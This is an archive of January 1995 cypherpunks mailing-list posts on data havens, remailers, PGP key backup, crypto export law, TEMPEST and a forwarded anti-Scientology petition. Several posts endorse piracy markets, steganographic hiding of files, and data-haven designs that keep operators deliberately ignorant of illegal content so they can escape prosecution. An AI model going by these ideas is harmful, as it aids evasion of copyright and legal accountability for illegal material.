> however, despite howls of protest even China is likely to knuckle down 
> eventually. What may be likely is distributed piracy markets, such as 
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> described in Tim's BlackNet spoof.
  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Yes, this is the way to go. The data havens have a location that is a
public key in cyberspace. Think of it as one entity placing an
anonymous, untraceable classified ad in a newspaper, readable by many,
and others placing ads in response. A two-way communication channel is
thus opened up, without regard for the physical location of each, the
nature of the communication, the data to be transferred, etc.

All of that is just detail.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 17 Jan 95 23:24:16 PST
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: remailer security
Message-ID: <v01510106ab427094ff06@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 8:50 PM 1/17/95, Mats Bergstrom wrote:
>There are ways of
>multiple chaining for the lazy, though: C2 lets you pick the chained
>sites by clicking on a web-page (but does it encrypt??).

No it doesn't. Which dramatically reduces its usefullnes. There should be
some
way to add encryption envelopes to the CGI script. Premail?

- --Lucky <who is about to find out if the new MacPGP and scripts that he
picked
up finally solved his clearsig problems>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Not-the-Real MacPGPv262

iQCVAwUBLxzBawSQkem38rwFAQE8qAP8DODqlKop7fo7zwWYDCYEbygxr8PT9yv7
w9CNqyPC57zufrjZJurg3twx91Uqf9fJ3mEGHGrDKfwqXu3A4RPo0E+BAJCyUS61
8Tqj80oM8TE7Nmr04pEBZhI5CgTq5lAjdTT5m7ndlP25IkJPl+W/eEdGnyKrqcXr
I8PL8jV2rU8=
=wEur
-----END PGP SIGNATURE-----

-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>
Date: Tue, 17 Jan 95 21:56:41 PST
To: cypherpunks@toad.com
Subject: Key backup (was: How do I know . ..)
Message-ID: <199501180601.BAA16566@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

'Stig' was reported to have written:

> Eric Hughes wrote:
> > 
> > pointer-to-chunk to each of 7 different people.  In the case of
> > catastrophe, you can recover your key.
> > 

> I'll second Eric on the utility of this practice.  I should've done this...
> I lost a new pgp key when my hard disk hit the fan last month.  I can't even
> revoke it...  

The "spread spectrum" approach might well be indicated for some life-or-
death key security matters, but the vast majority of PGP users probably
don't need or want to play Spy vs. Spy with their friends to backup keys.
There must be a more reasonable way to backup non-critical keys. Magnetic
media is much more reliable than it used to be, and less reliable than it
will soon be, but it's still vulnerable to phenomena such as EMP. Friends
are vulnerable to death and disagreements which may end their willingness
to participate in the reconstruction of your key.

I recognize that you can't just leave your private keyring lying around
indiscriminately (especially if it's labeled "PGP private keyring"), but
what's to prevent it from being reproduced in some kind of hard copy form
(barcode? ASCII?) on some durable stock (credit card plastic?) and tucked
away someplace especially safe? A credit card (postage stamp?) sized flat
item is pretty easy to hide, especially if it's real function isn't obvious.
I guarantee you that I can hide such an object in my home, tell you it's
here somewhere, and watch you die of old age before you and a small armada
of your henchmen can find it.

If it's still "passphrase-protected", an attacker would a) have to know
what to look for, b) have to find it, and c) obtain the passphrase. A
"brute force" physical attack (ie: machine seizure and thumbscrews) or
TEMPEST-based attack would, IMO, be less effort on the part of the
attacker and is therefore the practical limit on private keyring security.

Explanations as to why this would be a Bad Idea are actively solicited.


=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxyupioZzwIn1bdtAQErMgGAnlr/g/eLesvcCh9IdXy7RzH2vkKbC/x7
pbm/OA+W7z15ix0PzHOZ/vwpg9X5JBku
=TRHd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Wed, 18 Jan 95 18:10:33 PST
To: cypherpunks@toad.com
Subject: Lance Rose writes anti-cryptoanarchy in WIRED
Message-ID: <gate.i724yc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



I've missed recent traffic so forgive me if this has already come up.

Lance Rose writes a particularly twisted piece in the Idees Fortes section of
WIRED 3.02 (February). His basic premise is that tradritional forms of 
copyright law are sufficient to ensure that the Net poses only limited 
problems to mass content producers such as Time Warner. I agree with this,
as most people feel uncomfortable about 'stealing' however impossible it is
to detect. Lance Rose, though, goes on to insist that the reason for the
copyright law's strength will be the power of the omnipresent Net Cops (sic).
So that you don't consider him entirely ignorant, he acknowledges the 
increasing use of anon remailers. However, he adds (repeatedly), "Can't
we all use anonymous remailers to keep the Net knee-deep in infringing copies?
Nope. Net cops can swiftly clean each new infringement out of the major online
markets as soon as it appears." 

How will they do this so efficiently? By "deploying software agents" net-wide
to "search out anonymous infringements." He later admits the possibility of
"friend-to-friend" markets, but rejects the possibility of such markets growing
out of hand, as "few or none of the participants will know everyone else in the
circle" allowing cops to join them undetected (as if the Information Liberation
Front would mind giving the _cops_ pirated software). "A symbolic legal attack"
every once in a while will scare would-be black-marketeers.

Later, he does discuss the hidden costs of acquiring pirated versus genuine 
stuff - "the time and effort needed to track down pirate dealers [...] 
who are so deep underground even the cops can't find them."

Sheesh. And here we are, post-BlackNet, discussing untraceable paid-for
anon-remailers (which exist today on Sameer's c2.org blind server) and
data havens. I haven't bothered to hunt for Lance's address, which is not
given, but really I thought someone as prominent a SysLawyer as him would
be clued in. Nor have I found the time to send WIRED a letter. 

OTOH maybe ignorance, for LEA-friendly legislators who read WIRED, is bliss?
Let the sleeping dog lie, etc, just finish your data haven code ;-]

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Tue, 17 Jan 95 22:23:59 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on PRZ
In-Reply-To: <199501180556.VAA25844@jobe.shell.portal.com>
Message-ID: <199501180623.BAA02464@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Hal:
: 
: Another interesting quote: "Zimmermann is not in danger of being indicted
: for willfully exporting PGP. Rather, the U.S. attorney's office, here, is
: considering charging him for making PGP available in such a manner that
: it could be exported by a third party."  What the hell is this?  Can
: anyone point to the statute they may be referring to here?  This seems
: awfully broad.
: 

In a related story:
The U.S. attourney's office is also considering charging GM, Ford, and 
Chrysler for making automobiles available in such a manner that people 
could run someone over and leave the scene of the accident.

:)

- -----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxyzuh0c4/pqJauBAQEDtQP9FBsK/nzSgr4D4B/WjhYJRMlc43B4T0Cp
eSxmp+r/xN2yYkvnJS7hTnqRXKR6BO/cWYHxaoiiZ9yfF+duDxpnIOAUfu9k8+OG
EBJErsLRKi1x/V9JK8hbK+Qcj/+LU6vrNKPAyQ/8cDdLt+Pz0tdCeKhtKcQ9n9jb
WGvbzybIOBs=
=Bfj7
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Tue, 17 Jan 95 14:26:48 PST
To: cypherpunks@toad.com
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <9501160118.AA05350@snark.imsi.com>
Message-ID: <ceN9Zc5w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> writes:

> rishab@dxm.ernet.in says:
> > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> > member of the cypherpunks - a term that she coined." I didn't even know the
> > _was_ a charter.
> 
> Or a Jude Milhon, for that matter. Another example of the continuing
> decay of a once proud magazine...

Though I don't recall seeing her post to the list, I'll borrow Tim's words 
from the Cyphernomicon:

   2.4.10. "Where did the name 'Cypherpunks' come from?"
           + Jude Milhon, aka St. Jude, then an editor at "Mondo 2000,"
              was at the earliest meetings...she quipped "You guys are
              just a bunch of cypherpunks." The name was adopted
              immediately.


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 18 Jan 95 00:43:41 PST
To: cypherpunks@toad.com
Subject: --> A Net-Petition to the Church of Scientology, Please Read (fwd)
Message-ID: <pAD7lKjqRe1O077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I thought this was topical and VERY much of interest here.

Sam

- -------- Forwarded message --------
Newsgroups: alt.2600,alt.activism,alt.atheism,alt.censorship,alt.clearing.technology,alt.conspiracy,
Date: Tue, 17 Jan 1995 15:23:44 GMT
From: noring@netcom.com (Jon Noring)
Subject: --> A Net-Petition to the Church of Scientology, Please Read


[Hurry!  Signature tallying for this petition EXPIRES February 6, 1995!
Be sure to send your signature to cos-petition@netcom.com -- see the
instructions after the petition statement.  The petition statement
begins 68 lines down from here.]


Following this short introductory section is the petition statement to
the Church of Scientology and affiliated organizations regarding their
recent legal actions which have very serious ramifications for freedom
of expression on Usenet and the Internet.  It is somewhat long, but the
length is necessary to give you sufficient information to make an
informed decision.

I want to stress that this petition is NOT focused on the beliefs or
practices of the Church of Scientology.  Rather, it is focused on their
recent legal action, and this petition demands that they reconsider
these actions for the good of everyone, including themselves.  It should
also be made *very clear* that none of us should ever condone or support
any action which would censor or inhibit Scientology supporters from
being able to express their views and opinions on Usenet, the Internet,
and all other electronic forums, provided they do so in accordance with
accepted netiquette, as all of us should.

I encourage you to read the petition statement carefully, and if you
agree with all three demands (given near the end of the statement), to
then "sign" it via Internet e-mail using the instructions which follow
the statement.  Do follow EXACTLY the directions on how to "sign";
they are not difficult.

Note that only those with valid Internet-accessible e-mail addresses can
sign this petition.  Fortunately, nearly all on-line services, such as
CompuServe, and many BBS, do offer Internet e-mail acess, so just about
anybody who is electronically hooked up to some network in the world can
sign this petition.  If you are not sure what your Internet e-mail
address is, ask your site's sysadmin/sysop for assistance.

Please do upload this petition statement as soon as possible to any BBS
and on-line service in your area.  If you have access to one of the
major national on-line services such as CompuServe, Prodigy, AOL, etc.,
do try to upload it there.  We are trying to get at least 5000
signatures.  Even more signatures are entirely possible if we each put
in a little effort to inform others, such as friends and coworkers,
about the importance of this petition to electronic freedom of
expression.

I plan to make the signatures publicly available on or shortly after
February 7, 1995, and will also submit them to the Church of Scientology
as well as the newsmedia.

Important Note:  Because of the unusual sensitivity of this petition, I
will not submit nor reveal the e-mail signatures IF the total number of
validated signatures is less than 1000.  This offer is made for those
who would feel "exposed" if their name appears on a list with a small
number of signatures.  I fully expect to surpass 1000 signatures in one
or two days!  In addition, unlike past net-petitions, providing one's
full name in addition to one's e-mail address will be optional.
However, I highly encourage you to be brave and include your full name,
as all petitions are traditionally considered more "binding" if real
names are used.  I will tally the number of signatures with and without
full names when the petition drive ends February 6, 1995.

Thank you for your signature!  Let's all do our part to keep all
electronic networks free and open for everybody.

Jon Noring

(Disclaimer:  Nothing written in this petition transmittal should be
              construed as legal advice.  If you need legal assistance
              or advice concerning any of the issues brought up in this
              document, contact a qualified attorney.)


**************** Beginning of Petition Statement ********************

TO: The Church of Scientology, The Religious Technology Center, Bridge
    Publications, Inc., Office of Special Affairs, and all other
    affiliated organizations, divisions and corporations of the Church
    of Scientology

We, the undersigned, are disturbed by your recent legal attempts to
stifle the free flow of information on the Internet and Usenet.
Specifically, you have 1) threatened legal action against several
automated anonymous remailers unless they filter out *all* e-mail
targeted to the legitimate Usenet newsgroups alt.religion.scientology
(a.r.s.), and alt.clearing.technology (a.c.t.), open forums where all
points of view about Scientology, both pro and con, are welcome, and
2) demanded and actually attempted the removal of a.r.s. in gross
defiance of accepted Usenet practice and netiquette.

Concerning 1), since nearly all (if not all) of the e-mail sent to
a.r.s. and a.c.t. via the remailers is legitimate and originates from
individuals who sincerely believe they need to post anonymously because
of the nature of discussion, your demand, if implemented, would prevent
these individuals from freely expressing their views in the proper
forum.  Freedom of expression is internationally recognized as one of
the most important and sacred of basic human rights, and your demands
fly in the face of this recognition.  Your second demand, removing
a.r.s., would go even further in inhibiting freedom of expression on
all electronic networks.  It is a *very* serious matter to attempt to
remove forums of free expression.

Your primary argument for issuing these legal threats, according to
your statements, are that some people (the "perpetrators") have
knowingly posted *alleged* (meaning not yet demonstrated in a court of
law) Church of Scientology copyrighted and trade secret material to
a.r.s. and a.c.t., sometimes using the anonymous remailers as the
carrier (because of the common carrier-like nature of anonymous
remailers, the administrators of the remailers have no knowledge of such
activity taking place).  Though we do not condone making copyrighted
material available on any electronic network without the permission of
the copyright holder, your specific legal threats are short-sighted,
perceived to be mean-spirited, ineffective, and are on tenuous legal
grounds because

1) It won't stop those who are determined to make available alleged
   copyrighted materials on electronic networks.  They will find other
   avenues on the electronic networks to do so.  Only prosecuting the
   actual perpetrators will deter this alleged illegal activity.
2) Your demands, if met, will have the effect of leading to significant
   stifling of free speech and the exchange of information on all
   electronic networks which, if not illegal in some jurisdictions, goes
   against all accepted conventions of a free and open society,
3) You have not stated, nor is there any indication, that you intend to
   work in a cooperative manner with legitimate law-enforcement
   agencies, the courts, and/or the Internet to locate and prosecute
   the perpetrators of the *alleged* copyright violations in the
   countries they originated.

Thus, your threats are being construed, rightly or wrongly, by most on
the electronic networks as an attempt to stifle free discussion on
Scientology rather than trying to locate and prosecute the perpetrators
of the *alleged* copyright and trade secret violations.

With respect to the attempted removal of the newsgroup a.r.s., you also
stated that the word 'scientology' is trademarked and thus the name
a.r.s. infringes on such trademark.  This is appallingly ludicrous based
on past case law of similar situations, as well as your implicit
acknowledgement of the legitimacy of a.r.s. by allowing Church of
Scientology approved information to be posted to it by your supporters,
and possibly with your knowledge and/or approval, ever since it was
created July 1991, almost 3.5 years ago.

Therefore, we, the undersigned, make the following demands.

1) Regarding your charges of copyright violation over electronic
   networks:  You will cease all legal action, now and in the future,
   against any person, company, organization, etc., associated or
   affiliated in any way with all electronic networks, including the
   Internet, except that action which is necessary to locate and
   prosecute the perpetrators (as previously defined) of alleged
   copyright and trade secret violations, and other activity in
   violation of law, and *only* in full cooperation with legitimate
   law-enforcement agencies and/or the courts.

2) Regarding your trademark challenge of the Usenet newsgroup
   alt.religion.scientology:  You will cease all legal action, now and
   in the future, to remove any Usenet newsgroup, BBS forum, mailing
   list or other similar forum of public exchange of information over
   any electronic network, or to inhibit in any way the flow of
   information to and from these forums.  This includes, for example,
   ceasing all legal action demanding a) the removal of the Usenet
   newsgroup alt.religion.scientology and b) that anonymous remailers
   add filters as previously described.

3) You will publicly and officially state

   a) That you support the existence of free and open forums on all
      electronic networks to discuss Scientology from all perspectives
      and points of view (which includes yours), and

   b) That you do not support nor condone attempts by any entity to
      electronically censor, remove, obstruct, or tamper with any
      electronic communication except when allowed by a valid court
      order.

If you outright reject or refuse to even discuss these demands in a good
faith manner on Usenet, we have no other option but to consider such
rejection or refusal to even discuss to be an act of hostility by the
Church of Scientology towards the users of all electronic networks and
forums, including the Internet.  We are certain you do not want this,
and we do not want it either, so we offer to work with you any way we
can with regard to any legitimate demands you may have concerning
alleged copyright violation(s) and other illegal activity.

However, any attempts by you of any kind to tamper or in any manner
restrict the free flow of information (other than that *specifically*
restricted by law -- and *only* that) on any electronic network is
totally unacceptable and will not be tolerated for the reasons stated
above.

Signed,




******************* End of Petition Statement ***********************

======================================
Instructions for Signing This Petition
======================================

It must first be noted that this is a petition, not a vote.  By
"signing" it you agree with *all* the demands of the petition
statement.  If you do not agree with all the demands, then your only
recourse is to not sign it.

In addition, all e-mail signatures will be submitted to the Church of
Scientology as well as the newsmedia provided more than 1000 validated
signatures are obtained.  Including your full name is optional, but
very highly encouraged as that would add to the effectiveness of the
petition.  Signing via an anonymous remailer is discouraged, but not
forbidden, as an attempt will be made to separately tally signatures
from anonymous remailers.

Signing this petition is not hard, but to make sure your signature is
not lost or miscounted, please follow these directions exactly:

1) Prepare an e-mail message.  In the main body (NOT the Subject line)
   of your e-mail include the ONE-LINE statement:

SIGNED <Internet e-mail address> <Your full name (optional)>

   You need not include the "<" and ">" characters.  'SIGNED' should
   be capitalized.  As stated above, your full name is optional, but
   highly recommended.  If you do supply your name, please don't use
   a pseudonym or nickname, or your first name -- it's better to just
   leave it blank if it's not your full and real name.

              ***************************************
              Example:  My e-mail signature would be:

              SIGNED noring@netcom.com Jon E. Noring
              ***************************************

2) Please DON'T include a copy of this petition, nor any other text,
   in your e-mail message.  If you have comments to make, send e-mail
   to me personally, and NOT to the special petition e-mail signature
   address.

3) Send your e-mail message containing your signature to the following
   Internet e-mail address and NOT to me:

                     ===========================
                       cos-petition@netcom.com
                     ===========================

4) Within a few days of receipt of your signature, an automated
   acknowledgment will be e-mailed to you for e-mail address
   verification purposes.  You do not need to respond or reply to
   this acknowledgement when you receive it.


Thank you for signing this petition!

Jon Noring

(p.s., send your signature to cos-petition@netcom.com)


- --
OmniMedia           | The Electronic Bookstore.  Come in and browse!  Two
1312 Carlton Place  | locations:  ftp.netcom.com  /pub/Om/OmniMedia/books
Livermore, CA 94550 | and  ftp.awa.com  /pub/softlock/pc/products/OmniMedia
510-294-8153        | E-book publishing service follows NWU recommendations.


- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
     A skydiving school is one in which you MUST be a dropout to graduate

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLxzTPslnXxBRSgfNAQFJuwf9H7Y6hDvywsw5avIiFba+P32Ftbd9KibP
c4SBKp77jEiEZZ3r5LjBNttXDp4muci30cpiazIi/2p3ksFN6W1WCSs9/Uu1l1cO
8r54Am78JKuRZy+TENcLaQAiOyRc0Yxrmp+G8SBCeM+wwlEP8/OHmcnoFxhFYi27
TWMdyFa4j/ethsPt/6J5R4g5nfdVo3Y3rdxdkofNoORzh9jj12lZyn3xMUT9jSag
4mFEZTTQb8aeRwKVOZAqS1J5RxQBxuVyYaNBz9VE54MS2X/Ix81WUGA0IgkY/ZjW
EWdlDjxtl0OpjcXa2viis1fD29EYaDXSgogoTWhtmKZCdOjB0QgKiw==
=TwRa
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Tue, 17 Jan 95 14:26:56 PST
To: cypherpunks@toad.com
Subject: Known data havens for pirates? Doubtful
Message-ID: <gate.ms64yc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


I forget who wrote:
> blame them. Copyrighted data on a server in a jurisdiction that
> doesn't acknowledege the copyrights - a prime use for Data Havens
> when they come of age.

I suppose you _are_ aware that the US has threatened China with punitive
duties on $100 BILLION dollars worth of trade, and that China has started
holding some show trials (without shutting down its state-owned CD-piracy
factories). It's not going to be easy to find a country more willing and
able to ignore international copyright law (Berne Convention etc) than China;
however, despite howls of protest even China is likely to knuckle down 
eventually. What may be likely is distributed piracy markets, such as 
described in Tim's BlackNet spoof.

Read my earlier post on what Lance Rose thinks.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 18 Jan 95 00:00:22 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on PRZ
Message-ID: <199501180805.DAA18028@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Hal quotes the 1/16/95 EE Times:
> "Zimmermann is not in danger of being indicted
> for willfully exporting PGP. Rather, the U.S. attorney's office, here, is
> considering charging him for making PGP available in such a manner that
> it could be exported by a third party."

This is very odd indeed. It reminds me of the "like-a-book" shrink-wrap
software license agreements. Did they expect PRZ to run PGP solely on
a single computer at home, and allow house guests to use it ? Copies of a
piece of software can obviously be handled in any fashion by their possessors.
I can't conceive of a way to make software available without distributing
copies, other than allowing global execute permission (but not read permission)
for a copy running on an *ahem* "unhackable" server. I find it difficult to
believe, however, that arms export control statutes written for munitions
hardware mandate this extreme restriction on access. Such laws would turn the
export-controlled section of a gun store into an analogue of the reference
section of a library -- "you can use it here, but you can't check it out".
People using strong crypto remotely are forced to trust the remote crypto
server to some extent, which tends to defeat the whole purpose of the exercise.
It also starts to sound like a model for GAK.... :[

Anyone have an email address for someone at EE Times ?

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxzKkmf7YYibNzjpAQG+XwQAm5385MOcsjY76auUIe24uTQMRhZ8u2Yy
rIuGBdj/B4C1K9WRMhIWq1i1gMv4mBAF8FWfd/tPRfq5N49TgIyGY82SPmUczYgU
N/w6unO5HpnpzcvCGq368r/2UpS4UndLVwZEik0JIsIvjm9+Pevz5SZA1Z+O1piI
lJFQQgV3sck=
=nYey
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxzLrCoZzwIn1bdtAQGZKQGA1gpT6cXWN4pAwlRw2vOJJYCZvruyBde2
BOATJ32Sg19wwUXUk7z7A8VnVNU59twG
=kjXQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Tue, 17 Jan 95 14:54:15 PST
To: cypherpunks@toad.com
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com>
Message-ID: <5eP9Zc3w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@netcom.com (Timothy C. May) writes:

> > rishab@dxm.ernet.in says:
> > > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> > > member of the cypherpunks - a term that she coined." I didn't even know t
> > > _was_ a charter.
> > 
> > Or a Jude Milhon, for that matter. Another example of the continuing
> > decay of a once proud magazine...
> 
> I'm not sure what Perry's not having heard of Jude Milhon is supposed
> to mean, or how "Wired" interviewing her is "another example of the
> continuing decay," etc.

I suppose I should have elaborated in my original post. Of course I know
of Jude's role in cypherpunk history; in fact I thought it would interest
cpunks to know that she was interviewed. As for the 'charter' - it was 
no doubt WIRED's creative interpretation.

> She's not presently subscribed and hence can't speak up in this
> strange matter of how an interview with her implies a magazine is in
> decay.

Speaking of which, the list membership has hit 640. I'll be posting a
membership profile soon, since it's a year since I saw the one that
got me out of 'lurk mode' when I discovered I was the only cpunk in this
region.


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Wed, 18 Jan 95 03:27:49 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Known data havens for pirates? Doubtful
In-Reply-To: <199501180700.XAA14684@netcom2.netcom.com>
Message-ID: <9501181127.AA24624@toad.com>
MIME-Version: 1.0
Content-Type: text


> 
> The comments about data havens have been interesting to read. Being

[ .. ]

> Yes, this is the way to go. The data havens have a location that is a
> public key in cyberspace. Think of it as one entity placing an
> anonymous, untraceable classified ad in a newspaper, readable by many,
> and others placing ads in response. A two-way communication channel is
> thus opened up, without regard for the physical location of each, the
> nature of the communication, the data to be transferred, etc.
> 
> All of that is just detail.

Hmmm... then why use a data haven at all?  Split the file into small
pieces, encrypt each and post each piece in a newsgroups (the pieces may
even be posted as small garbles of data in sigs?).  When you need to 
recover the file checksites which archive those newsgroups.

Just a thought. It's probably quite doable for small files.

Another idea: use encryption/secret sharing combined with steganography
and upload copies of the said files to various ftp-sties or BBS's. (It
may be that this is more secure than data havens, since few SysAdmins
would bother checking for steganographically hidden files...)

> 
> --Tim May

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Wed, 18 Jan 95 07:21:06 PST
To: cypherpunks@toad.com
Subject: TEMPEST
Message-ID: <199501181520.AB24570@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I know, it's a little bit outside the normal realm of discussion, but...

The Cyphernomicon talks about a proposed, early Cypherpunk project that
dealt with TEMPEST/VanEck monitoring.  Did anyone carry this out beyond the
idea stage?  All I ever seem to see is "theory" and "hear-say" on this topic
(and the original VanEck article appears dated and incomplete).

I noticed the Consumertronics (John Williams in Alamogordo, New Mexico)
catalog has an assembled device that will work with EGA to SVGA monitors.
$3,995 seems a bit pricey though (or is it).  Has anyone had dealings with
Consumertronics in the past?

Replies directly back to me if this is a waste of bandwidth for the rest of
the list.

Thanks...

Joel McNamara
joelm@eskimo.com - finger for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan <djw@pentagon.io.com>
Date: Wed, 18 Jan 95 05:22:05 PST
To: kipp@warp.mcom.com (Kipp E.B. Hickman)
Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
In-Reply-To: <9501172240.AA05908@warp.mcom.com>
Message-ID: <199501181321.HAA04672@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Marc, isn't it possible (legally) to deliver products with a replaceble 
>> encryption library (dll). Delivery with a 40-bit key DLL. The user has 
>> the option to install a dll with a different keysize. Somewhat like 
>> winsock....
>
>
>Actually, it's probably worse than you think:
>
>There are govt's out there that won't let you import code that is
>"encryption ready". You must prove that your software is tamper proof
>before it can be imported, and tamper proofing means that you can't
>bolt on security. Also, I believe the export laws disallow "plug in"
>security in the US...
>
>The crypto legal world sucks.

Could you clarify the export restriction on "plug and play" encryption ready
products?  I am about to embark on a project that I want to be distributed
freely that would be designed around a generic encryption intereface that I
would wrap around a real encryption core such as PGP,etc.  I wanted to include a
BS encryption in the freely distributable package to prevent export woes.  The
project is in design stages now and I don't need this additional headache.

djw

-------------------------------------------------------------
Duncan J Watson                                    djw@io.com
"Sig Quote goes here"                              duncan@hasp.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 07:44:09 PST
To: cypherpunks@toad.com
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.SUN.3.91.950117183343.17037A-100000@unix3.netaxs.com>
Message-ID: <199501181543.HAA08161@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Michael Handler <grendel@netaxs.com>

   [automatically split and redistribute]
   If the authorities attempt to indict you for possessing illegal
   information / kiddie porn / whatnot, they have to prove that you
   interfered with the automatic redistribution process and examined the
   contents of the submission. If you in fact did not look at the submission,
   they would have a difficult time doing so. 

This is exactly the right kind of approach, I think.  It's more
expensive to implement than a readable-reject filter, but then I
expect a continuum of services.

The key legal point is "interfered with the automatic redistribution
process".  If an operator can point to those fixed properties of a
system which keep the operator ignorant, an opponent trying to prove
otherwise will have difficult time.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
